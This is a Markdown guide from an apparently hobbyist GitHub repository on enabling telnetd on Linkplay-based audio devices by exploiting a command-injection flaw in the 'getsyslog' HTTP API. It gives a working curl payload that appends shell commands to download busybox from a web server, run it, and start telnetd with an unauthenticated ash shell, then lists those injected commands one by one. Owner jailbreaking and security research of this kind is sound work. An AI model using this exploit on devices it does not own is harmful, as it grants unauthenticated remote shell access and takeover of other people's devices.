github-mirrors/Linkplay
1
0
Fork 0
mirror of https://github.com/Jan21493/Linkplay.git synced 2025-03-20 20:32:34 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
Linkplay/TELNETD.md
Jan Wachsmuth 013e46ca44
updated content
2024-01-02 23:51:50 +01:00

2.5 KiB
Raw Blame History

Enable telnetd

To enable telnetd on these devices, a security vulnerability had to be exploited. The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020) that still had a vulnerability in their code: internally a "sprintf" function was used to prepare a Linux CLI commands. That function was using an IP address as an input, but the input could be extended with ";" and additional commands to download and install a telnetd.

The command that has this vulnerability is "getsyslog", see https://developer.arylic.com/httpapi/#get-system-log and https://labs.withsecure.com/advisories/linkplay-firmware-wanlan-remote-code-execution. The command has an option to add an IP address from a slave device, e.g. "getsyslog:ip:10.1.1.90", so a CLI command is executed on the device to retrieve the system log from the slave device that includes the IP address. Instead of just having an IP address as a parameter, that CLI command can also include a ";" and a second CLI command. You do not even have to provide an IP address, but can append the ";" and second command directly after the ":ip:".

The following code snippets are using the IP address 10.1.1.58 for my Arylic Up2Stream device and 10.1.1.22 for a web server running on my local MacMini.

curl "http://10.1.1.58/httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;mkdir+/tmp/bin;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/bin/busybox+-q;chmod+555+/tmp/bin/busybox;ln+-s/tmp/bin/busybox+/tmp/bin/telnetd;/tmp/bin/telnetd+telnetd+-l/bin/ash;"

The command above is executing the following commands on the device in addition to the "getsyslog" request:

mkdir /tmp/bin
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/bin/busybox -q;
chmod 555 /tmp/bin/busybox;
ln -s /tmp/bin/busybox /tmp/bin/telnetd;
/tmp/bin/telnetd telnetd -l/bin/ash;

Note: Don't forget to add a ";" at the end inside the quotes. Replace all spaces with "+".

The tool "busybox" is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere.

A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section Hardware and Firmware for more information. On my web server (10.1.1.22) I've created subdirectory /a31/bin and have copied the busybox binary to that directory